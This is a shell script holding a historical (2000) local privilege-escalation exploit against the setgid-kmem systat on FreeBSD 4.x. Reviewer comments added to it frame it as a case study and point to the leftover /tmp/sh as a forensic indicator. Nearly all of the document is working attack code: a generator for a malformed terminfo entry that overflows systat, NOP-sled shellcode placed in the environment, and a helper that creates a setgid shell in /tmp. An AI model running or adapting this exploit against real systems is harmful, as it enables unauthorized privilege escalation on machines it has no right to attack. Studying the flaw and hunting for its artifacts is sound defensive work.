#!/bin/tcsh
##############################################################################
# (c) 2000 Przemysław Frasunek <venglin@freebsd.lublin.pl> #
# #
# FreeBSD 4.x systat (gid=kmem) trivial exploit #
# Idea by: Jouko Pynnönen <jouko@SOLUTIONS.FI> #
# #
# Dedicated to ksm. #
# #
# I was bored at school, so I wrote this exploit during English class. :) #
##############################################################################
# $Id: systat.sh,v 1.1.1.1 2001/05/21 15:28:06 venglin Exp $
#
# NOTE(review): historical (2000) proof of concept against the setgid-kmem
# systat(1) of FreeBSD 4.x, preserved as a case study. The weakness it relies
# on is a privileged binary parsing a terminfo database that lives under the
# user's own $HOME (.terminfo/s/screen below); the defensive lesson is that
# setuid/setgid programs must not trust attacker-writable input files, and
# that a terminfo/curses parser is part of their attack surface.
#
# Detection / cleanup notes for reviewers: /tmp/xx, /tmp/s and
# /tmp/sploitte.c are removed at the end, but /tmp/sh -- a copy of /bin/sh
# with group kmem and the setgid bit (mode 2755) -- is intentionally left
# behind. A setgid-kmem shell in /tmp is the artifact to hunt for.
echo "Preparing /tmp/xx..."
# Helper script whose path ("/tmp/xx") is embedded in the EGG payload below.
# It copies /bin/sh to /tmp and makes the copy setgid kmem. The here-doc body
# is file content written verbatim, not script logic.
cat << __EOF__ > /tmp/xx
#!/bin/csh
cp /bin/sh /tmp
/usr/bin/chgrp kmem /tmp/sh
chmod 2755 /tmp/sh
__EOF__
chmod 755 /tmp/xx
echo "Compiling exploit..."
# C generator for the malformed precompiled terminfo entry. Its output
# (written to fd 2) is captured into ~/.terminfo/s/screen further down. The
# source is written verbatim to /tmp/sploitte.c; OFF/ALIGN are the
# target-specific constants it was tuned with in 2000.
cat << __EOF__ > /tmp/sploitte.c
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#define OFF -400
#define ALIGN 516
long getesp(void)
{
__asm__("movl %esp, %eax\n");
}
int main(void)
{
/* precompiled malformed terminfo header */
char evilcap[] =
"\x1a\x01\x2a\x00\x26\x00\x21\x00\x82\x01\x09\x02\x73\x63\x72\x65"
"\x65\x6e\x7c\x56\x54\x20\x31\x30\x30\x2f\x41\x4e\x53\x49\x20\x58"
"\x33\x2e\x36\x34\x20\x76\x69\x72\x74\x75\x61\x6c\x20\x74\x65\x72"
"\x6d\x69\x6e\x61\x6c";
long ret = getesp() + OFF;
int i;
/* creating ~/.terminfo/s/screen precompiled binary */
write(2, evilcap, sizeof(evilcap)-1);
for (i=0;i<39;i++) write(2, "\0", 1);
for (i=0;i<86;i++) write(2, "\xff", 1);
write(2, "\0\0", 2);
for (i=0;i<750;i++) write(2, "\xff", 1);
for (i=0;i<ALIGN;i++) write(2, "a", 1);
fprintf(stderr, "%c%c%c%c", ((int)ret & 0xff),
(((int)ret & 0xff00) >> 8),
(((int)ret & 0xff0000) >> 16),
(((int)ret & 0xff000000) >> 24));
write(2, "\0", 1);
}
__EOF__
# creating terminfo binary
# No error check: if cc fails, /tmp/s is missing and the redirect below
# simply produces an empty ~/.terminfo/s/screen.
cc -o /tmp/s /tmp/sploitte.c
echo "Creating evil terminfo binary..."
# NOTE(review): if the cd fails (e.g. HOME unset), tcsh keeps going and the
# relative paths below land in the current directory instead.
cd $HOME
mkdir -p .terminfo/s
# TERM=screen steers the target's curses lookup to the entry written next;
# presumably the per-user ~/.terminfo is consulted before the system database.
setenv TERM screen
# `>&` in csh redirects both stdout and stderr; the generator writes to fd 2.
/tmp/s >& .terminfo/s/screen
# shellcode goes to env. plenty of nops are used, so usually adjusting offset
# isn't needed.
echo "Preparing shellcode in env..."
setenv EGG `perl -e 'print "\x90" x 10000 ; print "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/xx\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"'`
# boom.
# The target's output is discarded; its exit status is never inspected, so
# the script proceeds to cleanup whether or not anything happened.
echo "Running systat. If script will stop here, this system is not vulnerable."
/usr/bin/systat >& /dev/null
# clean me up.
# Only the staging files are removed; /tmp/sh (if created) is kept.
echo "Cleaning up..."
rm -f .terminfo/s/screen
rm -f /tmp/xx /tmp/s /tmp/sploitte.c
# your setgid shell :)
# Success indicator for the original author -- and the forensic indicator for
# a defender: an -rwxr-sr-x /bin/sh copy owned by group kmem in /tmp.
echo "Done."
ls -la /tmp/sh